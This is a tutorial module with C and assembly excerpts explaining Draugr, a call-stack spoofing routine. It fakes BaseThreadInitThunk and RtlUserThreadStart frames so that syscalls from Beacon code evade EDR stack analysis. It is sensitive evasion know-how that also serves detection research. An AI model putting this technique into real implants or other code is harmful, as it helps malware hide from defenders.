Difficulty: Intermediate

Module 5: The Spoof Assembly Routine

Five phases orchestrate the entire stack spoof — from address resolution to cleanup and return.

Module Overview

Draugr's core logic is distributed across five distinct phases. Each phase has a single responsibility: resolve addresses, calculate frame sizes, find a code gadget, build the synthetic stack and execute, then clean up. Understanding these phases is the key to understanding how every piece of the system fits together. This module covers the orchestration layer — the next modules will dive deep into the frame construction (Module 6) and the return mechanism (Module 7).

The Five-Phase Execution Model

Every Draugr syscall passes through five phases in strict order. If any phase fails, the syscall cannot proceed safely. The macro DRAUGR_SYSCALL triggers this entire pipeline.

Five-Phase Pipeline

Phase 1: DraugrInit → Phase 2: CalcStackSize → Phase 3: FindGadget → Phase 4: Spoof() ASM → Phase 5: Fixup

Phase Summary

| Phase | Function | Responsibility |
|---|---|---|
| 1 | DraugrInit | Resolve three key addresses: BaseThreadInitThunk+0x14, RtlUserThreadStart+0x21, and kernelbase.dll base |
| 2 | DraugrCalculateStackSize | Parse UNWIND_CODE arrays for both functions to determine exact frame sizes in bytes |
| 3 | DraugrFindGadget | Scan kernelbase.dll .text section for a JMP [RBX] gadget (bytes 0xFF 0x23) |
| 4 | Spoof() | Assembly routine: build three-layer synthetic stack, set up registers, execute syscall |
| 5 | Fixup | Deallocate synthetic frames, restore non-volatile registers, return to original caller |
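
The strict ordering and fail-stop behavior described above can be sketched in a few lines of C. This is a generic illustration, not Draugr's actual driver code: `PhaseFn`, `run_phases`, and the two demo phases are hypothetical names introduced here.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical phase signature: each phase reports success or failure. */
typedef bool (*PhaseFn)(void *ctx);

/* Demo phases (assumptions for illustration): each counts its own call. */
bool phase_ok(void *ctx)   { ++*(int *)ctx; return true; }
bool phase_fail(void *ctx) { ++*(int *)ctx; return false; }

/* Runs the phases in order and stops at the first failure.
 * Returns the index of the failing phase, or `count` if all succeeded. */
size_t run_phases(const PhaseFn *phases, size_t count, void *ctx)
{
    for (size_t i = 0; i < count; i++) {
        if (!phases[i](ctx)) {
            return i;   /* later phases depend on this one, so stop here */
        }
    }
    return count;
}
```

A caller would treat any return value smaller than `count` as "do not proceed", which mirrors the rule that a failed phase makes the rest of the pipeline unsafe to run.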

Phase 1: DraugrInit — Address Resolution

Before any stack spoofing can happen, Draugr must resolve three specific addresses. These addresses form the foundation of the entire fake call stack.

The Three Target Addresses

| Target | Why This Specific Offset |
|---|---|
| kernel32!BaseThreadInitThunk + 0x14 | Points to the instruction immediately after a CALL within the function. When the stack unwinder encounters this as a return address, it follows the unwind metadata for BaseThreadInitThunk and sees a legitimate call site. |
| ntdll!RtlUserThreadStart + 0x21 | Points to the instruction immediately after a CALL within the function. This is the bottom of every normal Windows thread's call stack: the function that the OS calls to start a thread. |
| kernelbase.dll base address | Needed for Phase 3 (gadget scanning). The JMP [RBX] gadget is found by scanning the .text section of this DLL. |

Why These Offsets?

The offsets +0x14 and +0x21 are not arbitrary. Each one lands on the instruction immediately after an existing CALL inside its function, which is exactly where a genuine return address would point. When an EDR's stack walker encounters these values as return addresses, it checks the bytes just before them for a CALL instruction and finds a real one. If the return address pointed to the function entry instead, there would be no preceding CALL and the frame would be flagged as suspicious. The offsets therefore make the fake return addresses look like genuine return sites from legitimate function calls.
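
To make the "preceding CALL" check concrete, here is a minimal sketch of the kind of heuristic a stack walker could apply to a candidate return address. It is an assumption-laden illustration: `preceded_by_call` is a hypothetical helper, it works on a plain byte buffer, and it recognizes only three common x64 CALL encodings.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Returns true if the bytes just before code[ret_off] look like a CALL.
 * Heuristic only: covers three common encodings, not every form. */
bool preceded_by_call(const uint8_t *code, size_t ret_off)
{
    /* E8 rel32: near relative call, 5 bytes long */
    if (ret_off >= 5 && code[ret_off - 5] == 0xE8)
        return true;

    /* FF 15 disp32: call qword ptr [rip+disp32], 6 bytes long */
    if (ret_off >= 6 && code[ret_off - 6] == 0xFF && code[ret_off - 5] == 0x15)
        return true;

    /* FF D0..D7: call through a register, 2 bytes (a REX prefix may precede) */
    if (ret_off >= 2 && code[ret_off - 2] == 0xFF &&
        (code[ret_off - 1] & 0xF8) == 0xD0)
        return true;

    return false;
}
```

An offset of 0 (the function entry) always fails this check because there are no preceding bytes to inspect, which matches the reasoning above about why the entry point makes a poor fake return address.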

C - DraugrInit (simplified)

BOOL DraugrInit(PDRAUGR_CONFIG config) {
    // All three modules are expected to be loaded already
    HMODULE hKernel32   = GetModuleHandleA("kernel32.dll");
    HMODULE hNtdll      = GetModuleHandleA("ntdll.dll");
    HMODULE hKernelBase = GetModuleHandleA("kernelbase.dll");
    if (!hKernel32 || !hNtdll || !hKernelBase) return FALSE;

    // Resolve kernel32!BaseThreadInitThunk and ntdll!RtlUserThreadStart
    FARPROC pBaseThreadInit = GetProcAddress(hKernel32,
                                  "BaseThreadInitThunk");
    FARPROC pRtlUserThread = GetProcAddress(hNtdll,
                                  "RtlUserThreadStart");
    if (!pBaseThreadInit || !pRtlUserThread) return FALSE;

    // Fake return addresses: the instruction after the CALL in each function
    config->BaseThreadInitThunk_Addr = (ULONG_PTR)pBaseThreadInit + 0x14;
    config->RtlUserThreadStart_Addr  = (ULONG_PTR)pRtlUserThread + 0x21;

    // kernelbase.dll base for gadget scanning (Phase 3)
    config->KernelBase_Addr = (ULONG_PTR)hKernelBase;

    return TRUE;
}

Every Thread Looks the Same

On any Windows system, every user-mode thread starts with the same bottom two frames: RtlUserThreadStart calls BaseThreadInitThunk, which calls the thread's entry point. By fabricating these exact frames, Draugr's fake stack is indistinguishable from a real thread's call stack. An EDR performing stack analysis sees the standard Windows thread initialization chain.

Phase 2: Stack Size Calculation

Each synthetic frame must be exactly the right size. If the frame for BaseThreadInitThunk is even one byte off, the stack unwinder will misalign and produce garbage frames. Draugr calculates these sizes by parsing the same UNWIND_CODE metadata that Windows uses internally.

Step 1: Get RUNTIME_FUNCTION

DraugrWrapperStackSize calls RtlLookupFunctionEntry to retrieve the RUNTIME_FUNCTION structure for the target function. This structure points to the function's UNWIND_INFO, which contains the UNWIND_CODE array.

C - DraugrWrapperStackSize

DWORD DraugrWrapperStackSize(ULONG_PTR functionAddr) {
    ULONG_PTR imageBase = 0;

    // RtlLookupFunctionEntry retrieves the RUNTIME_FUNCTION
    // for any address within an x64 function
    PRUNTIME_FUNCTION pRuntimeFunc = RtlLookupFunctionEntry(
        functionAddr,
        &imageBase,
        NULL    // HistoryTable - not needed
    );

    if (!pRuntimeFunc) return 0;

    // Parse the UNWIND_INFO to calculate total frame size
    return DraugrCalculateStackSize(imageBase, pRuntimeFunc);
}
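
Conceptually, the lookup in Step 1 is a search over a table of function ranges sorted by start address. The sketch below models that idea in portable C. It is not the real `RtlLookupFunctionEntry` implementation: `RuntimeFunction` mirrors the three documented RVA fields of the x64 `RUNTIME_FUNCTION`, while `lookup_entry` and the table it searches are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Same three fields as the documented x64 RUNTIME_FUNCTION (all RVAs). */
typedef struct {
    uint32_t begin_address;
    uint32_t end_address;          /* exclusive */
    uint32_t unwind_info_address;
} RuntimeFunction;

/* Binary search over a table sorted by begin_address.
 * Returns the entry whose [begin, end) range contains rva, or NULL. */
const RuntimeFunction *lookup_entry(const RuntimeFunction *table,
                                    size_t count, uint32_t rva)
{
    size_t lo = 0, hi = count;
    while (lo < hi) {
        size_t mid = lo + (hi - lo) / 2;
        if (rva < table[mid].begin_address) {
            hi = mid;                      /* target lies in the lower half */
        } else if (rva >= table[mid].end_address) {
            lo = mid + 1;                  /* target lies in the upper half */
        } else {
            return &table[mid];            /* rva falls inside this function */
        }
    }
    return NULL;                           /* no entry covers this address */
}
```

Any address inside a function resolves to the same entry, which is why passing a mid-function address such as a function start plus 0x14 still yields that function's unwind data.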

Step 2: Parse UNWIND_CODEs

DraugrCalculateStackSize iterates through the UNWIND_CODE array and accumulates the total bytes that the function's prologue allocates on the stack. Each opcode type contributes a different amount.

C - DraugrCalculateStackSize (core logic)

DWORD DraugrCalculateStackSize(ULONG_PTR imageBase,
                                PRUNTIME_FUNCTION pFunc)
{
    DWORD totalSize = 0;

    // Get UNWIND_INFO from RUNTIME_FUNCTION
    PUNWIND_INFO pUnwindInfo = (PUNWIND_INFO)(
        imageBase + pFunc->UnwindInfoAddress
    );

    DWORD i = 0;
    while (i < pUnwindInfo->CountOfCodes) {
        UNWIND_CODE code = pUnwindInfo->UnwindCode[i];

        switch (code.UnwindOp) {
            case UWOP_PUSH_NONVOL:     // push reg
                totalSize += 8;        // Each push = 8 bytes on x64
                i += 1;
                break;

            case UWOP_ALLOC_SMALL:     // sub rsp, N (small)
                totalSize += (code.OpInfo * 8) + 8;
                i += 1;
                break;

            case UWOP_ALLOC_LARGE:     // sub rsp, N (large)
                if (code.OpInfo == 0) {
                    // Next slot contains size / 8
                    totalSize += pUnwindInfo->UnwindCode[i+1].FrameOffset * 8;
                    i += 2;
                } else {
                    // Next TWO slots contain raw 32-bit size
                    DWORD rawSize = *(DWORD*)&pUnwindInfo->UnwindCode[i+1];
                    totalSize += rawSize;
                    i += 3;
                }
                break;

            case UWOP_SAVE_NONVOL:     // mov [rsp+N], reg (no allocation)
            case UWOP_SAVE_XMM128:
                i += 2;                // opcode slot + one offset slot
                break;

            case UWOP_SAVE_NONVOL_FAR: // same, with a 32-bit offset
            case UWOP_SAVE_XMM128_FAR:
                i += 3;                // opcode slot + two offset slots
                break;

            default:
                i += 1;  // Single-slot opcodes (e.g., UWOP_SET_FPREG)
                break;
        }
    }

    // Handle chained unwind info (UNW_FLAG_CHAININFO)
    if (pUnwindInfo->Flags & UNW_FLAG_CHAININFO) {
        // The chained RUNTIME_FUNCTION follows the UNWIND_CODE array,
        // which is padded to an even number of slots
        DWORD next = (pUnwindInfo->CountOfCodes + 1) & ~1u;
        PRUNTIME_FUNCTION pChained =
            (PRUNTIME_FUNCTION)&pUnwindInfo->UnwindCode[next];
        // The recursive call adds the 8-byte return address exactly once
        return totalSize + DraugrCalculateStackSize(imageBase, pChained);
    }

    // Add 8 bytes for the return address pushed by CALL
    totalSize += 8;

    return totalSize;
}

UNWIND_CODE Opcode Reference

| Opcode | Meaning | Stack Contribution |
|---|---|---|
| UWOP_PUSH_NONVOL | push reg (e.g., push rbp) | +8 bytes |
| UWOP_ALLOC_SMALL | sub rsp, N where N ≤ 128 | +(OpInfo * 8) + 8 bytes |
| UWOP_ALLOC_LARGE | sub rsp, N where N > 128 | Reads 1 or 2 extra UNWIND_CODE slots for the size |
| UWOP_SET_FPREG | lea rbp, [rsp+N] | 0 bytes (sets frame pointer, no allocation) |
| UWOP_SAVE_NONVOL | mov [rsp+N], reg | 0 bytes (saves register, no allocation) |
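
The table can be exercised on synthetic data without touching any Windows API. The sketch below uses a simplified slot model, which is an assumption made for portability: the real UNWIND_CODE packs the opcode and OpInfo into bitfields and reuses whole 16-bit slots as raw operands. `Slot`, `frame_size`, and the `OP_*` names are hypothetical; the numeric opcode values follow the documented x64 unwind format.

```c
#include <stddef.h>
#include <stdint.h>

enum {
    OP_PUSH_NONVOL = 0, OP_ALLOC_LARGE = 1, OP_ALLOC_SMALL = 2,
    OP_SET_FPREG = 3, OP_SAVE_NONVOL = 4, OP_SAVE_NONVOL_FAR = 5,
    OP_SAVE_XMM128 = 8, OP_SAVE_XMM128_FAR = 9
};

/* Simplified model of one unwind slot (not the real bitfield layout). */
typedef struct {
    uint8_t  op;    /* opcode, meaningful only in opcode slots  */
    uint8_t  info;  /* OpInfo, meaningful only in opcode slots  */
    uint16_t raw;   /* 16-bit payload, used by operand slots    */
} Slot;

/* Sums the stack bytes described by the slots, plus 8 for the return
 * address. Returns 0 if a multi-slot opcode runs past the array. */
uint32_t frame_size(const Slot *s, size_t n)
{
    uint32_t total = 0;
    size_t i = 0;
    while (i < n) {
        switch (s[i].op) {
        case OP_PUSH_NONVOL:
            total += 8; i += 1; break;
        case OP_ALLOC_SMALL:
            total += (uint32_t)s[i].info * 8 + 8; i += 1; break;
        case OP_ALLOC_LARGE:
            if (s[i].info == 0) {              /* one slot: size / 8 */
                if (i + 1 >= n) return 0;
                total += (uint32_t)s[i + 1].raw * 8; i += 2;
            } else {                           /* two slots: raw 32-bit size */
                if (i + 2 >= n) return 0;
                total += (uint32_t)s[i + 1].raw |
                         ((uint32_t)s[i + 2].raw << 16);
                i += 3;
            }
            break;
        case OP_SAVE_NONVOL: case OP_SAVE_XMM128:
            i += 2; break;                     /* no allocation, skip operand */
        case OP_SAVE_NONVOL_FAR: case OP_SAVE_XMM128_FAR:
            i += 3; break;                     /* no allocation, two operands */
        default:
            i += 1; break;                     /* e.g. OP_SET_FPREG */
        }
    }
    return total + 8;                          /* return address from CALL */
}
```

For a prologue of `push rbx` followed by `sub rsp, 0x20`, the slots are one UWOP_PUSH_NONVOL and one UWOP_ALLOC_SMALL with OpInfo = 3, so the total is 8 + 32 + 8 = 48 bytes. Skipping operand slots matters: an operand slot misread as an opcode would be counted as a spurious allocation.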

Chained Unwind Info

Some functions have chained unwind info (the UNW_FLAG_CHAININFO flag). This means the function's unwind data is split across multiple RUNTIME_FUNCTION entries. Draugr handles this by recursively calling DraugrCalculateStackSize on the chained entry. If it didn't, the calculated frame size would be too small, and the stack unwinder would misalign when walking past the synthetic frame.
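
Locating the chained entry comes down to one piece of index arithmetic. In the documented x64 unwind layout, the UNWIND_CODE array is padded to an even number of slots and the chained RUNTIME_FUNCTION follows it. A minimal sketch, with `chained_entry_slot` as a hypothetical helper name:

```c
#include <stdint.h>

/* Index of the first slot past the UNWIND_CODE array after rounding the
 * count up to an even number. The chained entry starts at this slot. */
uint32_t chained_entry_slot(uint8_t count_of_codes)
{
    return ((uint32_t)count_of_codes + 1u) & ~1u;
}
```

With three unwind codes the chained entry starts at slot 4, and with four codes it also starts at slot 4, because an even count needs no padding.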

The PRM (Parameter) Structure

The PRM structure is the central data package passed between the C orchestration code and the Spoof assembly routine. It carries everything the assembly needs to build the synthetic stack, execute the syscall, and clean up afterward.

PRM Structure Layout

| Offset | Field | Notes |
|---|---|---|
| 0x00 | Fixup address | ← [RBX] dereferences here |
| 0x08 | OG_retaddr | original return address |
| 0x10–0x38 | Saved RDI, RSI, R12–R15 | non-volatile registers |
| 0x40 | BaseThreadInitThunk frame size | from Phase 2 |
| 0x48 | RtlUserThreadStart frame size | from Phase 2 |
| 0x50 | BaseThreadInitThunk+0x14 | fake return address 1 |
| 0x58 | RtlUserThreadStart+0x21 | fake return address 2 |
| 0x60 | Gadget address (JMP [RBX]) | from Phase 3 |
| 0x68 | SSN (System Service Number) | from VxTable |
| 0x70 | Syscall instruction address | in ntdll stub |
| 0x78+ | Function arguments (arg1–argN) | passed to syscall |
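
Because the assembly addresses PRM fields by hard-coded offsets, the C declaration has to match the layout exactly. One way to guard against drift is to pin the offsets with compile-time assertions. The sketch below is illustrative: the field names are assumptions based on the layout above, every field is modeled as a 64-bit slot, and `PRM_MAX_ARGS` is a hypothetical capacity that the source does not specify.

```c
#include <stddef.h>
#include <stdint.h>

#define PRM_MAX_ARGS 12   /* hypothetical; the real capacity is not stated */

typedef struct {
    uint64_t fixup;                     /* 0x00: target of JMP [RBX]      */
    uint64_t og_retaddr;                /* 0x08: original return address  */
    uint64_t saved_rdi;                 /* 0x10 */
    uint64_t saved_rsi;                 /* 0x18 */
    uint64_t saved_r12;                 /* 0x20 */
    uint64_t saved_r13;                 /* 0x28 */
    uint64_t saved_r14;                 /* 0x30 */
    uint64_t saved_r15;                 /* 0x38 */
    uint64_t base_thread_init_size;     /* 0x40: from Phase 2 */
    uint64_t rtl_user_thread_size;      /* 0x48: from Phase 2 */
    uint64_t base_thread_init_addr;     /* 0x50: fake return address 1 */
    uint64_t rtl_user_thread_addr;      /* 0x58: fake return address 2 */
    uint64_t gadget;                    /* 0x60: from Phase 3 */
    uint64_t ssn;                       /* 0x68 */
    uint64_t syscall_addr;              /* 0x70 */
    uint64_t args[PRM_MAX_ARGS];        /* 0x78 onward */
} PRM;

/* Fail the build if the C layout drifts from the offsets used in assembly. */
_Static_assert(offsetof(PRM, fixup) == 0x00, "fixup must be first");
_Static_assert(offsetof(PRM, saved_rdi) == 0x10, "saved_rdi offset");
_Static_assert(offsetof(PRM, saved_r15) == 0x38, "saved_r15 offset");
_Static_assert(offsetof(PRM, gadget) == 0x60, "gadget offset");
_Static_assert(offsetof(PRM, args) == 0x78, "args offset");
```

Reordering or resizing a field then produces a build error instead of a silent mismatch between the C code and the offsets in the assembly stub.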

Why Fixup at Offset 0x00?

The first field of PRM is the Fixup address. This is not a coincidence — it is a critical design choice. After the syscall returns, the JMP [RBX] gadget executes. RBX points to the PRM structure. The instruction JMP [RBX] dereferences RBX and jumps to the value stored at [RBX + 0] — which is the Fixup address. By placing Fixup at offset zero, the gadget naturally redirects execution to the cleanup routine without any additional offset calculations.
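
The offset-zero argument can be modeled in plain C: a pointer to a structure is also a pointer to its first member, so dereferencing it with no added offset yields the first field. The sketch below is only an analogy. It performs an ordinary function call where the gadget performs a jump, and `PrmHead`, `demo_cleanup`, and `jump_through` are hypothetical names.

```c
#include <stdint.h>

typedef int (*CleanupFn)(void);

/* Only the head of the structure matters for this demonstration. */
typedef struct {
    CleanupFn fixup;        /* offset 0x00 */
    uint64_t  og_retaddr;   /* offset 0x08 */
} PrmHead;

/* Stand-in for the cleanup routine. */
int demo_cleanup(void) { return 42; }

/* C model of JMP [RBX]: load the pointer stored at the address held in
 * `rbx`, with no offset added, and transfer control to it. */
int jump_through(const void *rbx)
{
    CleanupFn target = *(const CleanupFn *)rbx;
    return target();
}
```

Had the cleanup pointer lived at any other offset, `jump_through` would need pointer arithmetic first, which a bare two-byte `JMP [RBX]` gadget cannot perform.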

Register Preservation

The x64 Windows calling convention designates certain registers as non-volatile (callee-saved). Any function that modifies these registers must restore them before returning. Since the Spoof routine manipulates the entire stack and register state, it must save and restore all non-volatile registers to maintain correctness.

Non-Volatile Register Save

At the very beginning of the Spoof routine, the following registers are saved into the PRM structure:

| Register | PRM Offset | Why It Must Be Saved |
|---|---|---|
| RDI | 0x10 | Callee-saved; used internally by Spoof for memory operations |
| RSI | 0x18 | Callee-saved; may be used as a source pointer |
| R12 | 0x20 | Callee-saved; available as scratch within Spoof |
| R13 | 0x28 | Callee-saved; available as scratch within Spoof |
| R14 | 0x30 | Callee-saved; available as scratch within Spoof |
| R15 | 0x38 | Callee-saved; available as scratch within Spoof |

ASM - Spoof() entry (from Stub.s)

Spoof:
    ; RCX = pointer to PRM structure
    mov  rbx, rcx              ; RBX = &PRM (persists across syscall)

    ; Save the original return address
    mov  rax, [rsp]            ; RAX = return address on stack
    mov  [rbx + 0x08], rax     ; PRM.OG_retaddr = return address

    ; Save all non-volatile registers into PRM
    mov  [rbx + 0x10], rdi     ; PRM.saved_rdi
    mov  [rbx + 0x18], rsi     ; PRM.saved_rsi
    mov  [rbx + 0x20], r12     ; PRM.saved_r12
    mov  [rbx + 0x28], r13     ; PRM.saved_r13
    mov  [rbx + 0x30], r14     ; PRM.saved_r14
    mov  [rbx + 0x38], r15     ; PRM.saved_r15

    ; ... Phase 4 continues: build synthetic stack ...

Why RBX Is the Anchor

RBX is a non-volatile register in the x64 calling convention, and the Windows system-call path honors that. The syscall instruction itself overwrites only RCX and R11, and the kernel restores the non-volatile registers before returning to user mode. After the syscall returns, RBX therefore still points to the PRM structure. This is why the JMP [RBX] gadget works: it can always find the Fixup address through the preserved RBX pointer, no matter what the kernel did during execution.

What Happens If Registers Are Not Restored?

If the Fixup routine fails to restore the non-volatile registers, the calling function will use corrupted values. The C compiler assumes that callee-saved registers are unchanged after a function call. Corrupted RDI, RSI, or R12-R15 would cause silent data corruption, wrong loop counters, invalid pointer dereferences, or outright crashes in the Beacon code that called the Draugr syscall.

Putting It All Together

Here is the complete data flow from the DRAUGR_SYSCALL macro to the Spoof assembly entry point:

Data Flow: C to Assembly

DRAUGR_SYSCALL (macro expands) → DraugrCall (fills PRM struct) → Spoof(&PRM) (RCX = &PRM) → Build Stack (3-layer synthetic) → syscall (kernel transition)

DraugrCall: The Packager

DraugrCall is the final C function before entering assembly. It populates every field of the PRM structure with data gathered from Phases 1–3, sets the SSN, the syscall instruction address, and copies all function arguments into the PRM. Then it calls Spoof(&PRM), passing the structure pointer in RCX (the first argument register on x64 Windows).

C - DraugrCall (simplified)

NTSTATUS DraugrCall(PDRAUGR_CONFIG config, PVX_TABLE_ENTRY entry,
                     DWORD argc, ...)
{
    PRM prm = { 0 };

    // Phase 1 results
    prm.BaseThreadInitThunk_Addr = config->BaseThreadInitThunk_Addr;
    prm.RtlUserThreadStart_Addr  = config->RtlUserThreadStart_Addr;

    // Phase 2 results
    prm.BaseThreadInitThunk_Size = config->BaseThreadInitThunk_FrameSize;
    prm.RtlUserThreadStart_Size  = config->RtlUserThreadStart_FrameSize;

    // Phase 3 result
    prm.Gadget = config->GadgetAddr;

    // SSN and syscall address from VxTable
    prm.SSN          = entry->wSSN;
    prm.SyscallAddr  = entry->pSyscallAddr;

    // Fixup routine address
    prm.Fixup = (ULONG_PTR)&Fixup;

    // Copy function arguments into PRM
    va_list args;
    va_start(args, argc);
    for (DWORD i = 0; i < argc; i++) {
        prm.args[i] = va_arg(args, ULONG_PTR);
    }
    va_end(args);

    // Enter the assembly routine
    return Spoof(&prm);
}
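
The argument-copy loop above writes `argc` values into a fixed-size array, so a bounds check is worth having. Here is a minimal, portable sketch of that packaging step in isolation. `pack_args` and its `cap` parameter are hypothetical and not part of Draugr.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdint.h>

/* Copies `argc` variadic 64-bit values into out[0..argc-1].
 * Returns 0 on success, or -1 (writing nothing) if argc exceeds cap. */
int pack_args(uint64_t *out, size_t cap, size_t argc, ...)
{
    if (argc > cap) {
        return -1;                       /* refuse to overflow the array */
    }

    va_list ap;
    va_start(ap, argc);
    for (size_t i = 0; i < argc; i++) {
        out[i] = va_arg(ap, uint64_t);   /* each argument occupies one slot */
    }
    va_end(ap);
    return 0;
}
```

Callers need to cast every argument to a 64-bit type, for example `pack_args(slots, 4, 2, (uint64_t)handle, (uint64_t)size)`. A bare `int` literal is passed as a 32-bit value, and reading it back as `uint64_t` is undefined behavior.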

Module 5 Quiz: The Spoof Assembly Routine

Q1: Why are the offsets +0x14 and +0x21 chosen for BaseThreadInitThunk and RtlUserThreadStart respectively?

Answer: Each offset lands directly after a real CALL instruction inside its function. When a stack walker looks backward from a return address for a preceding CALL, it finds a genuine one. If the offsets pointed to the function entry or to an address not preceded by a CALL, the return addresses would be flagged as invalid.

Q2: Why is the Fixup address stored at offset 0x00 in the PRM structure?

Answer: The JMP [RBX] gadget reads the value at the address stored in RBX and jumps there. Since RBX points to the start of the PRM structure, it reads offset 0x00. Placing the Fixup address at offset zero means the gadget naturally redirects to cleanup without needing any offset arithmetic.